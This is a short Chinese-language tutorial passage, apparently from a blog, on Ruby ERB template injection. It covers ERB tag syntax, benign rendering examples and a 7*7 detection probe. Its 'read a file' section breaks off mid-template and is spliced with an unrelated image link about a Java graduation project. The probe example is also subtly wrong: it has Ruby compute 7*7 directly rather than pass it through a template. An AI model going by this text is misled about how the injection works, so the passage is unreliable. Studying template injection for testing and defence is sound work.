了解Ruby ERB模板注入,Ruby ERB模板注入检测。
ERB是Ruby自带的
- <% 写逻辑脚本(Ruby语法) %>
- <%= 直接输出变量值或运算结果 %>
require 'erb'
template = "text to be generated: <%= x %>"
erb_object = ERB.new(template)
x = 5
puts erb_object.result(binding())
x = 4
puts erb_object.result(binding())
#Ruby ERB模板注入检测
如果x是可控的,跟普通模板注入一样
require 'erb'
template = "text to be generated: <%= x %>"
erb_object = ERB.new(template)
x = 7*7
puts erb_object.result(binding())
读取一个文件:
require 'erb'
template = "text to be generated: <%= x %>![[附源码]JAVA毕业设计人才公寓管理系统(系统+LW)](https://img-blog.csdnimg.cn/88bb425fb385432a9383d5ca9ccdb197.png)
